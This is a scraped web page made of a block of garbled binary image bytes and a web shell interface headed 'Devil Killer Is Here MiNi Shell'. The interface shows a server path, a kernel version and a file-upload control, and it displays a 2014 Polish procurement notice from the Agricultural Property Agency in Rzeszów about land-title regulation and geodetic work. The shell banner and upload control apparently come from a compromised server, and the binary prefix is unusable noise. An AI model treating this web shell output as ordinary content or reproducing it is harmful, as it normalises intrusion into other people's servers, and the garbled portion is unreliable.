JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140523/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140523/174880-N-2014.html

<p class="kh_header"><b>Rzeszów: Wykonanie regulacji stanu prawnego nieruchomości, synchronizacja i wykonanie map do celów prawnych, wykonanie opinii geodezyjnej dot. gruntów po dawnych majątkach ziemskich nieruchomości /działek/ będących w Zasobie Własności Rolnej Skarbu Państwa położonych na terenie woj. świętokrzyskiego i podkarpackiego</b><br>
<b>Numer ogłoszenia: 174880 - 2014; data zamieszczenia: 23.05.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Agencja Nieruchomości Rolnych Oddział Terenowy w Rzeszowie , ul. 8 Marca 13, 35-959 Rzeszów, woj. podkarpackie, tel. 17 853 78 00, faks 17 853 78 16.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.anr.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie regulacji stanu prawnego nieruchomości, synchronizacja i wykonanie map do celów prawnych, wykonanie opinii geodezyjnej dot. gruntów po dawnych majątkach ziemskich nieruchomości /działek/ będących w Zasobie Własności Rolnej Skarbu Państwa położonych na terenie woj. świętokrzyskiego i podkarpackiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wykonanie regulacji stanu prawnego nieruchomości, synchronizacja i wykonanie map do celów prawnych, wykonanie opinii geodezyjnej dot. gruntów po dawnych majątkach ziemskich nieruchomości /działek/ będących w Zasobie Własności Rolnej Skarbu Państwa położonych na terenie woj. świętokrzyskiego i podkarpackiego w formie XI odrębnych  zadań częściowych w tym:
województwo świętokrzyskie:
z zakresu regulacji stanu prawnego nieruchomości:
1 zadanie częściowe na terenie pow. ostrowieckiego, 1 zadanie częściowe na terenie pow. sandomierskiego,            
z zakresu synchronizacji i wykonania map do celów prawnych:
1 zadanie częściowe na terenie pow. ostrowieckiego, 1 zadanie częściowe na terenie pow. kieleckiego,   1 zadanie częściowe na terenie pow. pińczowskiego, 1 zadanie częściowe na terenie pow. jędrzejowskiego, 
z zakresu opinii geodezyjnych nieruchomości:
2 zadania częściowe na terenie  pow. jędrzejowskiego; 
województwo podkarpackie:
z zakresu opinii geodezyjnych nieruchomości:
1 zadanie częściowe na terenie pow. lubaczowskiego, 1 zadanie częściowe z terenu pow. jarosławskiego,
z zakresu regulacji stanu prawnego nieruchomości:
1 zadanie częściowe na terenu pow. tarnobrzeskiego. 

Dokumentacja dla Zamawiającego z wykonania regulacji stanu prawnego nieruchomości (działki) powinna zawierać: 
1.  Sprawozdanie z badania ksiąg wieczystych, zbioru dokumentów dla nieruchomości 
     (działki). 
2.  Zebranie decyzji dokumentujących przejście prawa własności regulowanej nieruchomości (działki) na rzecz Skarbu Państwa. 
3.  Uzyskanie od Zamawiającego dokumentów potwierdzających prawo Agencji do 
     nieruchomości (działki).
4.  Sporządzenie dokumentów geodezyjno - prawnych wymaganych dla potrzeb urządzenia 
     Księgi wieczystej o ile nieruchomość, której ujawnienie prawa własności na rzecz Skarbu 
     Państwa - Agencji Nieruchomości Rolnych dotychczas nie posiadała urządzonej księgi 
     Wieczystej w pozostałych wypadkach stanowiących podstawę do odłączenia do nowej    
     księgi wieczystej, bądź zmiany oznaczenia nieruchomości, powierzchni i właściciela.
5.  Przygotowanie w imieniu Agencji stosownego wniosku do właściwego miejscowo Sądu 
     Rejonowego Wydziału Ksiąg Wieczystych o dokonanie wpisu prawa własności.
6.  Dla działek pozostających w Zasobie, na które brak dowodów formalnego przejścia prawa 
     własności na rzecz Skarbu Państwa zabezpieczenie stosownych dokumentów do 
     odrębnego postępowania przed Sądem, bądź Organami administracji państwowej celem 
     sprostowania ewentualnych zaistniałych błędów, łącznie z pozyskaniem danych osób 
     będących stronami w postępowaniach odrębnych łącznie z właściwym adresami.
7.  Dla działek w stosunku, do których uległy zmianie dane co do oznaczenia nieruchomości 
     i powierzchni po dacie przekazania ich do Zasobu Własności Rolnej Skarbu Państwa, 
     Przyjmujący zamówienie wykona wykaz zmian, niezależnie od wykazu   
     synchronizacyjnego pomiędzy stanem wieczysto - księgowym a ewidencją gruntów.

Dokumentacja dla Zamawiającego z wykonania dokumentów geodezyjnych do celów prawnych, synchronizacji i regulacji stanu prawnego nieruchomości (działki) powinna zawierać: 
1.  Sprawozdanie z badania ksiąg wieczystych, zbioru dokumentów dla nieruchomości 
     (działki). 
2.  Zebranie decyzji dokumentujących przejście prawa własności regulowanej nieruchomości (działki) na rzecz Skarbu Państwa do. 
3.  Uzyskanie od Zamawiającego dokumentów potwierdzających prawo Agencji do 
     nieruchomości (działki).
4.  Sporządzenie dokumentów geodezyjno - prawnych wymaganych dla potrzeb urządzenia 
     Księgi wieczystej o ile nieruchomość, której ujawnienie prawa własności na rzecz Skarbu 
     Państwa - Agencji Nieruchomości Rolnych dotychczas nie posiadała urządzonej księgi 
     Wieczystej w pozostałych wypadkach stanowiących podstawę do odłączenia do nowej    
     księgi wieczystej, bądź zmiany oznaczenia nieruchomości, powierzchni i właściciela.
5.  Przygotowanie w imieniu Agencji stosownego wniosku do właściwego miejscowo Sądu 
     Rejonowego Wydziału Ksiąg Wieczystych o dokonanie wpisu prawa własności.
6.  Dla działek pozostających w Zasobie, na które brak dowodów formalnego przejścia prawa 
     własności na rzecz Skarbu Państwa zabezpieczenie stosownych dokumentów do 
     odrębnego postępowania przed Sądem, bądź Organami administracji państwowej celem 
     sprostowania ewentualnych zaistniałych błędów, łącznie z pozyskaniem danych osób 
     będących stronami w postępowaniach odrębnych łącznie z właściwym adresami.
7.  Dla działek w stosunku, do których uległy zmianie dane co do oznaczenia nieruchomości 
     i powierzchni po dacie przekazania ich do Zasobu Własności Rolnej Skarbu Państwa, 
     Przyjmujący zamówienie wykona wykaz zmian, niezależnie od wykazu   
     synchronizacyjnego pomiędzy stanem wieczysto - księgowym a ewidencją gruntów.

Dokumentacja dla Zamawiającego dot. wykonania opinii geodezyjnej dot. gruntów po dawnych majątkach ziemskich polegać ma na sprawdzeniu zasadności roszczeń do majątku stanowiącego przed dniem przejęcia na rzecz Skarbu Państwa własność prywatną w oparciu o zachowane dokumenty archiwalne do działek stanowiących aktualnie Zasób Własności Rolnej Skarbu Państwa oznaczonych w operacie ewidencji gruntów obrębu ..............., gm. ....................,  pow. ......................... nr ................................ 
o łącznej powierzchni .....................................ha w związku z podnoszonym roszczeniem przez byłego właściciela/spadkobiercę byłego właściciela ................................................</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.13.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 11.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku dokonana zostanie na podstawie oświadczeń złożonych przez wykonawcę wg wzorów stanowiących załączniki nr 2, 3 oraz 4 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku dokonana zostanie na podstawie oświadczenia złożonego przez wykonawcę wg wzoru stanowiącego załącznik nr 4 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku dokonana zostanie na podstawie oświadczenia złożonego przez wykonawcę wg wzoru stanowiącego załącznik nr 4 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku dokonana zostanie na podstawie oświadczeń złożonych przez wykonawcę wg wzorów stanowiących załączniki nr 2, 3 oraz 4 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku dokonana zostanie na podstawie oświadczenia złożonego przez wykonawcę wg wzoru stanowiącego załącznik nr 4 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Informacja o wymaganych dokumentach i oświadczeniach jakie mają dostarczyć Wykonawcy:
Wyjaśnienia dodatkowe:
1)	Wykonawcą może być osoba fizyczna, osoba prawna lub jednostka organizacyjna nie posiadająca osobowości prawnej oraz podmioty występujące wspólnie.
2)	Podmioty składające ofertę wspólną zobowiązane są przedłożyć wszystkie wymagane dokumenty wymienione w §9 oraz dodatkowo dokumenty wymienione w punkcie d) odrębnie dla każdego z tych podmiotów oraz dowód ustanowienia przez nich pełnomocnika do reprezentowania wspólnie występujących w nin. postępowaniu wykonawców, a następnie zawarcia umowy. 
3)	Dokumenty można złożyć w formie oryginału lub kserokopii poświadczonych przez wykonawcę /za zgodność z oryginałem/- na każdej zapisanej stronie dokumentu.
Składanie ofert wspólnych i podwykonawstwo
1.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, ustanawiają pełnomocnika do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego
2.	W przypadku złożenia przez wykonawców oferty wspólnej do oferty winny być załączone również:
a)	oryginał lub poświadczona przez Wykonawców za zgodność kserokopia pełnomocnictwa, do reprezentowania ich w postępowaniu o udzielenie zamówienia, albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego,
b)	wskazanie lidera (w przypadku oferty złożonej przez konsorcjum),
c)	oświadczenie o spełnieniu warunków w postępowaniu, oraz oświadczenie o braku podstaw do wykluczenia z powodu niespełnienia warunków określonych w art. 24 ust. 1 ustawy, podpisane przez pełnomocnika lub wszystkich wykonawców, 
d)	pozostałe dokumenty wymagane w SIWZ przez Zamawiającego podpisane przez pełnomocnika lub wszystkich wykonawców.
3.	Kopie dokumentów składanych przez wykonawców wspólnie ubiegających się 
o udzielenie zamówienia lub kopie dokumentów dostarczonych przez osoby, na których potencjale będzie polegał wykonawca, winny być poświadczone za zgodność 
z oryginałem przez wykonawcę, pełnomocnika lub te podmioty.
4.	Korespondencja prowadzona będzie przez Zamawiającego wyłącznie z Pełnomocnikiem (liderem konsorcjum), którego adres należy wpisać w formularzu oferty.
5.	Zamawiający dopuszcza wykonanie części przedmiotu zamówienia przy udziale podwykonawców. Wykonawca ma obowiązek wskazać w ofercie (jeżeli dotyczy) - 
w wykazie podwykonawców (załącznik nr 2 do SIWZ), rodzaj prac (wyrażony 
w procentach), których wykonanie powierzy podwykonawcą. 

Zasadnicze dokumenty składające się na ofertę:
a)	wypełniony formularz oferty,
b)	wypełniony formularz cenowy w treści tabeli określającej poszczególne zadania częściowe stanowiące załącznik do SIWZ,
c)	dokumenty potwierdzające spełnienie przez wykonawców wymaganych warunków ujętych w § 9  SIWZ.
2.	Każdy wykonawca może złożyć tylko jedną ofertę obejmującą całość zamówienia, kilka bądź jedno zadanie częściowe. Oferty składane są w jednym egzemplarzu. 
3.	Ofertę należy sporządzić w języku polskim, z zachowaniem formy pisemnej pod rygorem nieważności. 
4.	Wszelkie koszty związane z przygotowaniem oferty ponosi wykonawca.
5.	Oferta musi wyrażać stanowczą wolę wykonawcy do zawarcia umowy określonej treści, zdefiniowanej we wzorze umowy stanowiącej załącznik do specyfikacji istotnych warunków zamówienia. 
6.	Oferta musi być podpisana przez osoby uprawnione do reprezentowania wykonawcy 
w obrocie gospodarczym, zgodnie z aktem rejestracyjnym i wymogami ustawowymi.
7.	Oferta musi być wypełniona w sposób czytelny, niezmywalnym tuszem, atramentem itp., wszelkie poprawki winny być zaparafowane przez osobę/osoby upoważnione do reprezentowania wykonawcy.
8.	Oferta winna być sporządzona wg wzoru stanowiącego zał. nr 1 do SIWZ. W przypadku sporządzania oferty i załączników nie na drukach formularzy załączonych do SIWZ należy zachować jednolity układ oraz kolejność pełnego zakresu treści. 
9.	Wszystkie zapisane strony oferty (łącznie z załącznikami) muszą być ponumerowane poczynając od pierwszej strony oferty poprzez wszystkie załączniki. 
10.	Zamawiający może żądać przedstawienia oryginału lub notarialnie potwierdzonej kopii dokumentu, jeżeli przedstawiona przez wykonawcę kserokopia jest nieczytelna lub budzi wątpliwości, co do jej prawdziwości. 
11.	W przypadku gdy wykonawcę reprezentuje pełnomocnik, pełnomocnictwo             w oryginale musi być dołączone do oferty.
12.	Ofertę należy zszyć, oprawić lub złożyć w innej formie uniemożliwiającej rozsypanie kartek.
13.	Wykonawca może, przed upływem terminu składania ofert, zmienić lub wycofać ofertę. 
14.	Oferta winna być opakowana w sposób uniemożliwiający jej odczytanie przed otwarciem.
Kompletną ofertę należy złożyć w opakowaniu zaadresowanym do zamawiającego:              Agencja Nieruchomości Rolnych Oddział Terenowy w Rzeszowie, 35-959 Rzeszów,  ul. 8 Marca 13, nr zadania RZ.SOP.0160.6.2014 opisując: /przetarg nieograniczony na wykonanie regulacji stanu prawnego nieruchomości, synchronizacja i wykonanie map do celów prawnych, wykonanie opinii geodezyjnej dot. gruntów po dawnych majątkach ziemskich nieruchomości /działek/ będących w Zasobie Własności Rolnej Skarbu Państwa położonych na terenie woj. świętokrzyskiego i podkarpackiego/ nie otwierać do dnia 5 czerwca 2014 roku do godziny  11:00.
15.	Na odwrocie koperty lub w innym miejscu należy podać adres i nazwę firmy składającej ofertę. 
16.	Rozliczenia za wykonane usługi dokonywane będą tylko w złotych polskich</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Istotne dla Zamawiającego postanowienia, które zostaną wprowadzone do treści zawartej umowy
1.	Istotne dla Zamawiającego postanowienia, które zostaną wprowadzone do treści zawieranej umowy, wysokość kar umownych z tyt. niewykonania lub nienależytego wykonania umowy zawiera wzór stanowiący załącznik nr 6 do SIWZ.
2.	Wykonawca akceptuje treść wzoru umowy oświadczeniem zawartym w treści formularza ofertowego.
3.	Zamawiający przewiduje możliwość wprowadzenia zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy:
3.1. Dopuszcza się zmianę umownego terminu, pod warunkiem, że:
a) wystąpią czynniki zewnętrzne niezależne od Zamawiającego i Wykonawcy, które nie pozwalają na prawidłowe i terminowe wykonanie zamówienia (np. zdarzenia losowe, czynniki atmosferyczne),
b) przedłużają się procedury administracyjne związane bezpośrednio z wykonaniem umowy,
c) zaistnieje potrzeba przeprowadzenia robót dodatkowych, wyłącznie na czas ich prowadzenia jeżeli nie jest możliwe ich przeprowadzenie jednocześnie z zadaniem podstawowym,
3.2. Dopuszcza się zmianę umownego wynagrodzenia w przypadku ustawowej zmiany wysokości stawki podatku od towarów i usług.
3.3.1. Zamawiający zastrzega sobie, możliwość wyłączenia z umowy części zamówienia. 
2.  W przypadku wyłączenia określonego w pkt 1 niniejszego paragrafu lub odstąpienia przez Zamawiającego od umowy lub jej części z przyczyn niezależnych od Przyjmującego zamówienie, Zamawiający zobowiązuje się do pokrycia kosztów przygotowanej dokumentacji i dojazdów, lub rozliczenia wykonanych prac w wysokości:
- 25% ceny brutto za działki, dla których Przyjmujący zamówienie zabezpieczył dokumenty, na podstawie, których wynika, że regulowane działki nie są własnością Zamawiającego lub mają urządzoną Księgę Wieczystą własną Agencji z zapisami zgodnymi z ewidencją gruntów i budynków;
- 75% ceny brutto za działki, dla których przygotowano i złożono wniosek do sądu 
a do dnia przeprowadzenia odbioru końcowego nie wpłynęło do Zamawiającego zawiadomienie z sądu o założeniu księgi wieczystej dla tych działek, a pozostałą część pozostawiając na wniosek Wykonawcy bez rozliczenia; oraz za działki, dla których Wykonawca przedłożył dokumenty pozwalające na skierowanie sprawy na drogę odrębnego postępowania (braku dowodów potwierdzających prawo własności i konieczność przeprowadzenia dodatkowego postępowania),  
- bez rozliczenia pozostawić działki, co do których nie przeprowadzono żadnej z ww. procedur.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.anr.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Agencja Nieruchomości Rolnych Oddział Terenowy w Rzeszowie 
ul. 8 Marca 13, 35-959 Rzeszów
pok. nr 30.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.06.2014 godzina 10:00, miejsce: Agencja Nieruchomości Rolnych Oddział Terenowy w Rzeszowie 
ul. 8 Marca 13, 35-959 Rzeszów
(pokój przyjmowania korespondencji nr 2 - parter).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> regulacja stanu prawnego - teren pow. ostrowieckiego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> wykonanie regulacji 8 działek.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.13.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> regulacja stanu prawnego - teren pow. sandomierskiego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> wykonanie regulacji 18 działek.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.13.00.00-4.</p></li>
